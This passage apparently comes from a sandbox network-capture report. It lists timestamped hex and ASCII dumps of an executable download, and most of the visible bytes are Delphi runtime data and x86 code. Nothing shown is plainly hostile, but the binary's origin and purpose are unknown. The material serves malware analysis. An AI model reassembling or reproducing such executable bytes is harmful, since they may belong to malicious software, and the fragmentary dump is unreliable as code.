                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4INData Raw: 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 5c 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 88 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 4c 5d 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 18 7c 4b 00 09 43 6c 61 73 73 54 79 70 65 03 00 14 13 40 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 34 00 e8 5b 40 00 09 43 6c 61 73 73 4e 61 6d 65 03 00 b8 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 b8 12 40 00 01 00 01 01 02 00 02 00 39 00 00 5c 40 00 0b 43 6c 61 73 73 4e 61 6d 65 49 73 03 00 00 10
                                                                                                                                                                                                                                    Data Ascii: poseOf@Self>\@InitInstance@Self@Instance/L]@CleanupInstance@Self)|KClassType@@Self4[@ClassName@Self@@9\@ClassNameIs
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5INData Raw: 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 30 60 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 34 60 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00 28 60 40 00 0e 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 03 00 00 00 00 00 08 00 02 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 2b 00 88 5c 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 88 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00
                                                                                                                                                                                                                                    Data Ascii: AfterConstruction@Self10`@BeforeDestruction@Self94`@Dispatch@SelfMessage?(`@DefaultHandler@SelfMessage+\@NewInstance@Self
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7INData Raw: 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 64 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 f4 23 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e 54 53 70 69 6e 4c 6f 63 6b 04 00 00 00 00 00 00 00 00 01 00 00 00 9c 10 40 00 00 00 00 00 00 05 46 4c 6f 63 6b 02 00 02 00 02 00 08 e0 63 40 00 05 45 6e 74 65 72 00 00 00 00 00 00 00 02 00 08 0c 64 40 00 04 45 78 69 74 00 00 00 00 00 00 00 02 00 00 00 00 58 24 40 00 0e 08 54 4d 6f 6e 69 74 6f 72 1c 00 00 00 00 00 00 00 00 07 00 00 00 9c 10 40 00 00 00 00 00 00 0a 46 4c 6f 63 6b 43 6f 75 6e 74 0c 00 f8 21 40 00 b8 5c
                                                                                                                                                                                                                                    Data Ascii: TMonitor.TWaitingThreadd#@Next@Thread@WaitEvent#@TMonitor.TSpinLock@FLockc@Enterd@ExitX$@TMonitor@FLockCount!@\
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8INData Raw: 61 63 65 64 4f 62 6a 65 63 74 f4 27 40 00 88 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 0f 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 c5 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 38 29 40 00 14 0c 50 53 68 6f 72 74 53 74 72 69 6e 67 e4 11 40 00 02 00 50 29 40 00 0a 0a 55 54 46 38 53 74 72 69 6e 67 e9 fd 02 00 64 29 40 00 0a 0d 52 61 77 42 79 74 65 53 74 72 69 6e 67 ff ff 02 00 00 7c 29 40 00 14 05 50 42 79 74 65 b4 10 40 00 02 00 00 00 00 90 29 40 00 14 06 50 49 6e 74 36 34 14 11 40 00 02 00 00 00 a4 29 40 00 14 09 50 45 78 74 65 6e 64 65 64 9c 11 40 00 02 00 00 00 00 bc 29 40 00 14 09 50 43 75 72 72 65 6e 63 79 d0 11 40 00 02 00 00 00 00 d4 29 40 00 14 08 50 56 61 72 69 61 6e 74 f0 12 40 00 02 00
                                                                                                                                                                                                                                    Data Ascii: acedObject'@@System)@@@RefCount8)@PShortString@P)@UTF8Stringd)@RawByteString|)@PByte@)@PInt64@)@PExtended@)@PCurrency@)@PVariant@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9INData Raw: 6e 74 65 67 65 72 06 74 6b 43 68 61 72 0d 74 6b 45 6e 75 6d 65 72 61 74 69 6f 6e 07 74 6b 46 6c 6f 61 74 08 74 6b 53 74 72 69 6e 67 05 74 6b 53 65 74 07 74 6b 43 6c 61 73 73 08 74 6b 4d 65 74 68 6f 64 07 74 6b 57 43 68 61 72 09 74 6b 4c 53 74 72 69 6e 67 09 74 6b 57 53 74 72 69 6e 67 09 74 6b 56 61 72 69 61 6e 74 07 74 6b 41 72 72 61 79 08 74 6b 52 65 63 6f 72 64 0b 74 6b 49 6e 74 65 72 66 61 63 65 07 74 6b 49 6e 74 36 34 0a 74 6b 44 79 6e 41 72 72 61 79 09 74 6b 55 53 74 72 69 6e 67 0a 74 6b 43 6c 61 73 73 52 65 66 09 74 6b 50 6f 69 6e 74 65 72 0b 74 6b 50 72 6f 63 65 64 75 72 65 09 74 6b 4d 52 65 63 6f 72 64 06 53 79 73 74 65 6d 02 00 00 00 00 1c 2f 40 00 0e 07 54 56 61 72 52 65 63 08 00 00 00 00 00 00 00 00 14 00 00 00 9c 10 40 00 00 00 00 00 02 08 56
                                                                                                                                                                                                                                    Data Ascii: ntegertkChartkEnumerationtkFloattkStringtkSettkClasstkMethodtkWChartkLStringtkWStringtkVarianttkArraytkRecordtkInterfacetkInt64tkDynArraytkUStringtkClassReftkPointertkProceduretkMRecordSystem/@TVarRec@V
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC11INData Raw: 01 00 00 00 00 08 00 00 00 84 33 40 00 06 66 73 5a 65 72 6f 07 66 73 4e 5a 65 72 6f 0a 66 73 44 65 6e 6f 72 6d 61 6c 0b 66 73 4e 44 65 6e 6f 72 6d 61 6c 0a 66 73 50 6f 73 69 74 69 76 65 0a 66 73 4e 65 67 61 74 69 76 65 05 66 73 49 6e 66 06 66 73 4e 49 6e 66 05 66 73 4e 61 4e 06 53 79 73 74 65 6d 02 00 00 34 40 00 0e 0e 54 45 78 74 65 6e 64 65 64 38 30 52 65 63 0a 00 00 00 00 00 00 00 00 01 00 00 00 9c 11 40 00 00 00 00 00 00 0b 61 45 78 74 65 6e 64 65 64 38 30 02 00 02 00 07 00 08 18 7c 4b 00 08 45 78 70 6f 6e 65 6e 74 00 00 9c 10 40 00 00 02 00 08 18 7c 4b 00 08 46 72 61 63 74 69 6f 6e 00 00 9c 11 40 00 00 02 00 08 18 7c 4b 00 08 4d 61 6e 74 69 73 73 61 00 00 34 11 40 00 00 02 00 08 18 7c 4b 00 0b 53 70 65 63 69 61 6c 54 79 70 65 00 00 84 33 40 00 00 02
                                                                                                                                                                                                                                    Data Ascii: 3@fsZerofsNZerofsDenormalfsNDenormalfsPositivefsNegativefsInffsNInffsNaNSystem4@TExtended80Rec@aExtended80|KExponent@|KFraction@|KMantissa4@|KSpecialType3@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC12INData Raw: 20 62 79 74 65 73 3a 20 00 00 00 00 55 6e 6b 6e 6f 77 6e 00 41 6e 73 69 53 74 72 69 6e 67 00 00 55 6e 69 63 6f 64 65 53 74 72 69 6e 67 00 00 00 0d 0a 00 00 55 6e 65 78 70 65 63 74 65 64 20 4d 65 6d 6f 72 79 20 4c 65 61 6b 00 00 8b 08 89 0a 8b 48 04 8b 40 08 89 4a 04 89 42 08 c3 8d 40 00 8b 08 89 0a 8b 48 04 89 4a 04 8b 48 08 89 4a 08 8b 48 0c 8b 40 10 89 4a 0c 89 42 10 c3 8d 40 00 8b 08 89 0a 8b 48 04 89 4a 04 8b 48 08 89 4a 08 8b 48 0c 89 4a 0c 8b 48 10 89 4a 10 8b 48 14 8b 40 18 89 4a 14 89 42 18 c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 8b 48 20 89 4a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 8b 48 28 89 4a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df
                                                                                                                                                                                                                                    Data Ascii: bytes: UnknownAnsiStringUnicodeStringUnexpected Memory LeakH@JB@HJHJH@JB@HJHJHJHJH@JB@(hhhH J zzz:@(hhhh H(J(z zzz:(hhhh
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC13INData Raw: e8 ee f9 ff ff 85 c0 74 15 8b c7 83 e8 10 89 70 08 03 58 0c 83 cb 08 89 58 0c 8b df eb 77 8b c5 e8 7a 00 00 00 8b d8 85 db 74 6a 81 fd 2c 0a 04 00 76 08 8b c3 83 e8 10 89 70 08 8b c7 83 e8 10 8b 40 08 8b d3 8b cf 91 e8 de fb ff ff 8b c7 e8 cf 03 00 00 eb 3f d1 eb 3b f3 72 0a 8b df 83 ef 10 89 77 08 eb 2f 8b c6 e8 32 00 00 00 8b d8 85 db 74 22 81 fe 2c 0a 04 00 76 08 8b c7 83 e8 10 89 70 08 8b d3 8b c7 8b ce e8 cd fb ff ff 8b c7 e8 8e 03 00 00 8b c3 83 c4 20 5d 5f 5e 5b c3 8d 50 03 c1 ea 03 3d 2c 0a 00 00 53 8a 0d 59 b0 4b 00 0f 87 48 02 00 00 84 c9 0f b6 82 90 b9 4b 00 8d 1c c5 80 70 4b 00 75 56 8b 53 08 8b 42 10 b9 f8 ff ff ff 39 da 74 17 83 42 14 01 23 48 fc 89 4a 10 89 50 fc 74 28 c6 03 00 5b c3 90 90 90 8b 53 18 0f b7 4b 02 01 c1 3b 43 14 77 76 83 42
                                                                                                                                                                                                                                    Data Ascii: tpXXwztj,vp@?;rw/2t",vp ]_^[P=,SYKHKpKuVSB9tB#HJPt([SK;CwvB
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC15INData Raw: 89 5c 33 f8 89 f0 89 da e8 51 f7 ff ff c6 05 e8 ba 4b 00 00 31 c0 5e 5b c3 90 8d 04 33 83 e1 f0 01 cb 81 f9 30 0b 00 00 72 c2 e8 ef f6 ff ff eb bb 90 8b 4e f8 29 ce 01 cb 81 f9 30 0b 00 00 72 b1 89 f0 e8 d6 f6 ff ff eb a8 81 3d f0 ba 4b 00 e0 ff 13 00 75 2c 83 ee 10 8b 06 8b 56 04 89 50 04 89 02 c6 05 e8 ba 4b 00 00 68 00 80 00 00 6a 00 56 e8 2b f4 ff ff 83 f8 01 19 c0 5e 5b c3 90 90 90 8d 9e e0 ff 13 00 e8 31 f7 ff ff c7 43 fc 02 00 00 00 c7 05 f0 ba 4b 00 e0 ff 13 00 89 1d ec ba 4b 00 c6 05 e8 ba 4b 00 00 31 c0 5e 5b c3 90 90 5b f6 c2 03 0f 84 9a f8 ff ff b8 ff ff ff ff c3 8b 48 fc f6 c1 07 53 56 89 c6 0f 85 88 00 00 00 8b 19 0f b7 4b 02 83 e9 04 39 d1 72 37 8d 1c 95 40 00 00 00 39 cb 72 04 5e 5b c3 90 89 d3 89 d0 e8 4f fa ff ff 85 c0 74 16 89 d9 89 c2
                                                                                                                                                                                                                                    Data Ascii: \3QK1^[30rN)0r=Ku,VPKhjV+^[1CKKK1^[[HSVK9r7@9r^[Ot
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC16INData Raw: d7 80 c2 30 b8 14 00 00 00 2b c6 88 14 04 85 db 75 d4 8b d5 8d 04 04 8b ce e8 9b 0c 00 00 8d 04 2e 83 c4 14 5d 5f 5e 5b c3 53 56 8b f1 8b da 8b d3 8b ce e8 81 0c 00 00 8b c3 03 c6 5e 5b c3 8b c0 53 8b da 85 c0 74 12 83 c0 c8 8b 00 0f b6 08 40 8b d3 e8 d1 ff ff ff 5b c3 a1 6c 70 4b 00 e8 91 35 00 00 8b c8 8b d3 a1 6c 70 4b 00 e8 b7 ff ff ff 5b c3 90 55 8b ec 53 8b d0 81 fa ff ff 00 00 76 65 f6 c2 03 75 60 8b 55 08 8b 52 e4 8b c8 3b d1 77 0d 8b 5d 08 03 53 f0 83 c1 04 3b d1 73 17 8b 55 08 33 c9 89 4a f0 6a 1c 8b 55 08 83 c2 e4 52 50 e8 0d ee ff ff 8b 45 08 83 78 f0 04 72 1e 8b 45 08 81 78 f4 00 10 00 00 75 12 8b 45 08 f6 40 f8 f6 74 09 8b 45 08 f6 40 f9 01 74 04 33 c0 eb 07 b0 01 5b 5d c3 33 c0 5b 5d c3 55 8b ec 53 56 57 8b fa 8b d8 81 ff e8 03 00 00 7d 65
                                                                                                                                                                                                                                    Data Ascii: 0+u.]_^[SV^[St@[lpK5lpK[USveu`UR;w]S;sU3JjURPExrExuE@tE@t3[]3[]USVW}e
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC17INData Raw: ff 8b 1d 80 db 4b 00 eb 37 8b c3 83 c0 10 e8 dd fc ff ff 84 c0 75 26 c6 85 ff 47 fe ff 00 8b 73 0c 83 e6 f0 83 ee 04 83 ee 10 8b 85 f8 47 fe ff 89 b4 85 dc 07 fe ff ff 85 f8 47 fe ff 8b 5b 04 81 fb 7c db 4b 00 74 0c 81 bd f8 47 fe ff 00 10 00 00 7c b5 80 bd ff 47 fe ff 00 0f 85 a6 02 00 00 c6 85 f7 47 fe ff 00 33 c0 89 85 e8 47 fe ff a1 5c 70 4b 00 e8 22 30 00 00 8b c8 8d 95 dc 87 fd ff a1 5c 70 4b 00 e8 44 fa ff ff 8b d8 c7 85 f0 47 fe ff 37 00 00 00 c7 85 e0 47 fe ff 82 70 4b 00 8d 85 fc 4f fe ff 89 85 dc 47 fe ff 8b 85 e0 47 fe ff 0f b7 00 83 e8 04 89 85 e4 47 fe ff c6 85 f6 47 fe ff 00 bf ff 00 00 00 8b 85 dc 47 fe ff 8b f0 8d 85 db ff fd ff 3b d8 0f 87 2c 01 00 00 83 3e 00 0f 86 16 01 00 00 80 bd f7 47 fe ff 00 75 21 a1 60 70 4b 00 e8 9e 2f 00 00 8b
                                                                                                                                                                                                                                    Data Ascii: K7u&GsGG[|KtG|GG3G\pK"0\pKDG7GpKOGGGGG;,>Gu!`pK/
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC19INData Raw: 83 3d 8c db 4b 00 00 74 19 68 00 80 00 00 6a 00 a1 8c db 4b 00 50 e8 7c e4 ff ff 33 c0 a3 8c db 4b 00 e8 00 ff ff ff c3 8d 40 00 85 c0 74 0a ff 15 6c 77 4b 00 85 c0 74 02 f3 c3 b0 01 e9 5d 01 00 00 c3 85 c0 7e 13 ff 15 60 77 4b 00 85 c0 74 02 f3 c3 b0 01 e9 45 01 00 00 31 c0 f3 c3 90 85 c0 74 0a ff 15 64 77 4b 00 85 c0 75 02 f3 c3 b0 02 e9 29 01 00 00 c3 8b 08 85 c9 74 32 85 d2 74 18 50 89 c8 ff 15 68 77 4b 00 59 09 c0 74 19 89 01 c3 b0 02 e9 06 01 00 00 89 10 89 c8 ff 15 64 77 4b 00 09 c0 75 eb c3 b0 01 e9 f0 00 00 00 85 d2 74 10 50 89 d0 ff 15 60 77 4b 00 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 e7 77 00 00 83 b8 00 00 00 00 00 74 0f e8 d9 77 00 00 8b 80 00 00 00 00 8b 40 08 c3 33 c0 c3 e8 c7 77 00 00 83 b8 00 00 00 00 00 74 0f e8 b9 77 00 00 8b 80 00 00 00
                                                                                                                                                                                                                                    Data Ascii: =KthjKP|3K@tlwKt]~`wKtE1tdwKu)t2tPhwKYtdwKutP`wKYt@wtw@3wtw
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC20INData Raw: 66 89 48 0a 66 89 48 08 66 89 48 06 66 89 48 04 66 89 48 02 66 89 08 c3 c3 90 53 56 57 89 c6 50 85 c0 0f 84 83 00 00 00 31 c0 31 db bf cc cc cc 0c 66 8b 1e 83 c6 02 66 83 fb 20 74 f4 b5 00 66 83 fb 2d 74 76 66 83 fb 2b 74 72 66 83 fb 24 74 74 66 83 fb 78 74 6e 66 83 fb 58 74 68 66 83 fb 30 75 19 66 8b 1e 83 c6 02 66 83 fb 78 74 56 66 83 fb 58 74 50 66 85 db 74 27 eb 05 66 85 db 74 35 66 83 eb 30 66 83 fb 09 77 2b 39 f8 77 27 8d 04 80 01 c0 01 d8 66 8b 1e 83 c6 02 66 85 db 75 e0 fe cd 74 0b 85 c0 7d 68 eb 0b 83 c6 02 eb 06 f7 d8 7e 5d 78 5b 5b 29 de eb 59 fe c5 66 8b 1e 83 c6 02 eb 86 bf ff ff ff 0f 66 8b 1e 83 c6 02 66 85 db 74 d6 66 83 fb 61 72 04 66 83 eb 20 66 83 eb 30 66 83 fb 09 76 0e 66 83 eb 11 66 83 fb 05 77 c3 66 83 c3 0a 39 f8 77 bb c1 e0 04 01
                                                                                                                                                                                                                                    Data Ascii: fHfHfHfHfHfSVWP11ff tf-tvf+trf$ttfxtnfXthf0uffxtVfXtPft'ft5f0fw+9w'ffut}h~]x[[)Yffftfarf f0fvffwf9w
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC21INData Raw: c3 5f 5e 5b 59 59 5d c3 90 53 56 89 c3 8b 43 ac 85 c0 74 29 8b 08 83 c0 04 8b 32 3b 30 75 18 8b 72 04 3b 70 04 75 10 8b 72 08 3b 70 08 75 08 8b 72 0c 3b 70 0c 74 13 83 c0 1c 49 75 dc 8b 5b d0 85 db 74 04 8b 1b eb c5 31 c0 5e 5b c3 53 56 81 c4 00 ff ff ff 8b f2 e8 49 01 00 00 85 c0 74 5e 8b d0 8b ca 83 c1 02 42 0f b6 02 03 c8 8d 59 0a 80 7b 01 40 74 0b 8b d6 8b c3 e8 ae 6a 00 00 eb 44 54 8d 44 24 04 66 ba 3a 00 b9 ff 00 00 00 e8 9d 25 00 00 8d 44 24 04 8b d3 b9 01 00 00 00 e8 05 2b 00 00 8b d0 42 8b c3 b9 ff ff ff 7f e8 a6 21 00 00 8b c4 8b d6 e8 71 6a 00 00 eb 07 8b c6 e8 fc 1a 00 00 81 c4 00 01 00 00 5e 5b c3 8d 40 00 53 56 8b f2 8b d8 85 db 74 0d 8b 03 8b d6 e8 ad 00 00 00 84 c0 75 05 33 c0 5e 5b c3 b0 01 5e 5b c3 8d 40 00 55 8b ec 51 53 56 8b f2 8b d8
                                                                                                                                                                                                                                    Data Ascii: _^[YY]SVCt)2;0ur;pur;pur;ptIu[t1^[SVIt^BY{@tjDTD$f:%D$+B!qj^[@SVtu3^[^[@UQSV
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC23INData Raw: eb 15 e8 d9 d2 ff ff eb 0e 8b c8 b8 04 00 00 00 d3 e0 e8 45 00 00 00 ff 03 83 3b 00 7d 06 c7 03 0a 00 00 00 5e 5b c3 90 53 51 8b d8 33 c0 89 04 24 8b 13 85 d2 75 0f 8b c2 b9 01 00 00 00 f0 0f b1 0b 3b d0 74 09 8b c4 e8 63 ff ff ff eb e2 5a 5b c3 8b c0 33 d2 f0 87 10 c3 8b c0 83 f8 00 7e 08 f3 90 48 83 f8 00 7f f8 c3 8b c0 55 8b ec 83 c4 f4 33 c0 89 45 f4 68 e8 64 40 00 68 08 65 40 00 e8 b2 d2 ff ff 50 e8 b4 d2 ff ff 85 c0 0f 84 8d 00 00 00 8d 45 f4 50 6a 00 e8 b1 d3 ff ff 85 c0 75 7e e8 68 d2 ff ff 83 f8 7a 75 74 8b 45 f4 e8 83 ef ff ff 89 45 f8 33 d2 55 68 d2 64 40 00 64 ff 32 64 89 22 8d 45 f4 50 8b 45 f8 50 e8 7d d3 ff ff 8b 45 f8 83 7d f4 00 76 28 66 83 78 04 02 75 14 80 78 08 01 75 0e 0f b7 40 0a 89 45 fc e8 63 0d 00 00 eb 31 83 c0 18 83 6d f4 18 83
                                                                                                                                                                                                                                    Data Ascii: E;}^[SQ3$u;tcZ[3~HU3Ehd@he@PEPju~hzutEE3Uhd@d2d"EPEP}E}v(fxuxu@Ec1m
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC24INData Raw: 83 c2 cc 8b 32 03 f0 83 ee 04 8b 06 89 04 24 8b 1c 24 83 e3 fe 85 db 75 30 e8 0d fc ff ff 8b d0 8b 0c 24 83 e1 01 0b ca 8b 04 24 f0 0f b1 0e 8b 06 89 04 24 8b 1c 24 83 e3 fe 85 db 74 e2 3b d3 74 07 8b c2 e8 12 d9 ff ff 8b c3 5a 5e 5b c3 53 e8 a2 fc ff ff 85 c0 74 10 8b 40 08 8b 1d f8 b8 4b 00 33 c9 33 d2 ff 53 10 5b c3 53 8b d8 83 3d f8 b8 4b 00 00 75 07 b0 1a e8 bd eb ff ff 8b c3 e8 76 ff ff ff e8 c5 ff ff ff 5b c3 8d 40 00 53 56 8b f0 8b c6 e8 5d fc ff ff 8b d8 85 db 74 1d 8b 43 08 8b 1d f8 b8 4b 00 33 c9 33 d2 ff 53 10 8b c6 e8 40 fc ff ff 8b d8 85 db 75 e3 5e 5b c3 8d 40 00 53 8b d8 83 3d f8 b8 4b 00 00 75 07 b0 1a e8 65 eb ff ff 8b c3 e8 1e ff ff ff e8 ad ff ff ff 5b c3 8d 40 00 55 8b ec 51 53 8b da 89 45 fc 8b 45 fc 83 c0 18 e8 d3 f9 ff ff 33 d2 55
                                                                                                                                                                                                                                    Data Ascii: 2$$u0$$$$t;tZ^[St@K33S[S=Kuv[@SV]tCK33S@u^[@S=Kue[@UQSEE3U
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC25INData Raw: b0 00 00 00 00 89 a0 00 00 00 00 8b 6f 08 8b 5f 04 c7 47 04 8c 6e 40 00 83 c3 05 e8 66 fe ff ff ff e3 e9 53 02 00 00 e8 ca 5d 00 00 8b 88 00 00 00 00 8b 11 89 90 00 00 00 00 8b 41 08 e9 3c ee ff ff b8 01 00 00 00 c3 8b c0 8b 44 24 04 f7 40 04 06 00 00 00 0f 85 6f 01 00 00 81 38 de fa ed 0e 74 1f fc e8 f9 ec ff ff 8b 15 14 b0 4b 00 85 d2 0f 84 53 01 00 00 ff d2 85 c0 75 0a e9 48 01 00 00 8b 40 18 8b 00 8b 54 24 08 53 56 57 55 8b 4a 04 8b 59 05 8d 71 09 89 c5 8b 06 85 c0 74 43 89 ef eb 02 8b 3f 8b 00 39 f8 74 37 8b 48 cc 3b 4f cc 75 17 8b 40 c8 8b 57 c8 31 c9 8a 08 3a 0a 75 09 40 42 e8 09 11 00 00 74 18 8b 7f d0 8b 06 85 ff 75 d0 83 c6 08 4b 75 c0 5d 5f 5e 5b e9 e7 00 00 00 8b 44 24 14 81 38 de fa ed 0e 8b 50 18 8b 48 14 74 41 ff 15 18 b0 4b 00 8b 54 24 1c
                                                                                                                                                                                                                                    Data Ascii: o_Gn@fS]A<D$@o8tKSuH@T$SVWUJYqtC?9t7H;Ou@W1:u@BtuKu]_^[D$8PHtAKT$
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC27INData Raw: 4b 00 8b 78 04 33 c0 55 68 fe 73 40 00 64 ff 30 64 89 20 85 db 7e 1a 4b 89 1d a4 db 4b 00 8b 74 df 04 85 f6 74 07 83 3e 00 74 02 ff d6 85 db 7f e6 33 c0 5a 59 59 64 89 10 eb 14 e9 85 f9 ff ff e8 a8 ff ff ff e8 7f fd ff ff e8 ce fd ff ff 5f 5e 5b 5d c3 90 55 8b ec 51 53 56 57 a1 a0 db 4b 00 85 c0 74 56 8b 38 33 db 8b 40 04 89 45 fc 33 c0 55 68 6a 74 40 00 64 ff 30 64 89 20 3b fb 7e 1c 8b 45 fc 8b 34 d8 43 89 1d a4 db 4b 00 85 f6 74 07 83 3e 00 74 02 ff d6 3b fb 7f e4 33 c0 5a 59 59 64 89 10 eb 14 e9 19 f9 ff ff e8 3c ff ff ff e8 13 fd ff ff e8 62 fd ff ff 5f 5e 5b 59 5d c3 c7 05 1c b0 4b 00 b0 36 40 00 c7 05 20 b0 4b 00 b8 36 40 00 a3 a0 db 4b 00 33 c0 a3 a4 db 4b 00 89 15 a8 db 4b 00 8b 42 04 a3 40 b0 4b 00 b8 98 db 4b 00 e8 ac fe ff ff c6 05 48 b0 4b 00
                                                                                                                                                                                                                                    Data Ascii: Kx3Uhs@d0d ~KKtt>t3ZYYd_^[]UQSVWKtV83@E3Uhjt@d0d ;~E4CKt>t;3ZYYd<b_^[Y]K6@ K6@K3KKB@KKHK
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC28INData Raw: c6 05 59 b0 4b 00 01 8b 45 08 50 8b 45 0c 50 53 b8 a8 78 40 00 50 8b 45 f8 50 8b 45 fc 50 e8 49 bd ff ff 8b f0 85 f6 75 07 8b c3 e8 c0 da ff ff 8b c6 5f 5e 5b 59 59 5d c2 0c 00 90 53 8b d8 83 3d 38 70 4b 00 00 74 08 8b c3 ff 15 38 70 4b 00 53 e8 2e bd ff ff 5b c3 85 c0 7e 39 50 01 c0 70 2f 83 c0 0e 70 2a e8 69 da ff ff 83 c0 0c 5a c7 40 f8 01 00 00 00 89 50 fc 66 c7 04 50 00 00 66 c7 40 f6 02 00 8b 15 80 b9 4b 00 66 89 50 f4 c3 e9 2f e2 ff ff 31 c0 c3 85 c0 7e 43 50 83 c0 0e 70 38 83 e0 fe 52 50 e8 28 da ff ff 5a 59 66 c7 44 02 fe 00 00 83 c0 0c 5a 89 50 fc c7 40 f8 01 00 00 00 85 c9 75 06 8b 0d 7c b9 4b 00 89 ca 66 89 50 f4 66 c7 40 f6 01 00 c3 e9 e5 e1 ff ff 31 c0 c3 8b c0 b0 01 e9 45 db ff ff c3 85 c0 74 10 50 6a 00 e8 b4 bd ff ff 85 c0 0f 84 e4 ff ff
                                                                                                                                                                                                                                    Data Ascii: YKEPEPSx@PEPEPIu_^[YY]S=8pKt8pKS.[~9Pp/p*iZ@PfPf@KfP/1~CPp8RP(ZYfDZP@u|KfPf@1EtPj
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC29INData Raw: 10 74 23 85 d2 0f 84 e8 fb ff ff 8b 4a fc d1 e9 0f 84 dd fb ff ff 51 52 50 e8 3d b9 ff ff 85 c0 0f 84 65 fb ff ff c3 85 d2 74 28 8b 4a f8 41 7f 1e 50 52 8b 42 fc 0f b7 52 f4 e8 00 fb ff ff 89 c2 58 52 8b 48 fc e8 f4 d6 ff ff 5a 58 eb 04 f0 ff 42 f8 87 10 85 d2 74 14 8b 4a f8 49 7c 0e f0 ff 4a f8 75 08 8d 42 f4 e8 2a d5 ff ff c3 90 85 c0 74 05 83 e8 04 8b 00 c3 8b c0 33 d2 85 c0 74 09 eb 01 42 80 3c 10 00 75 f9 8b c2 c3 8b c0 33 d2 85 c0 74 0a eb 01 42 66 83 3c 50 00 75 f8 8b c2 c3 90 8b 10 85 d2 74 38 8b 4a f8 49 74 32 53 89 c3 8b 42 fc e8 45 fa ff ff 89 c2 87 03 50 8b 48 fc d1 e1 e8 76 d6 ff ff 58 8b 48 f8 49 7c 0e f0 ff 48 f8 75 08 8d 40 f4 e8 b9 d4 ff ff 8b 13 5b 89 d0 c3 8d 40 00 8b 10 85 d2 74 3a 8b 4a f8 49 74 34 53 89 c3 8b 42 fc 0f b7 52 f4 e8 3d
                                                                                                                                                                                                                                    Data Ascii: t#JQRP=et(JAPRBRXRHZXBtJI|JuB*t3tB<u3tBf<Put8JIt2SBEPHvXHI|Hu@[@t:JIt4SBR=
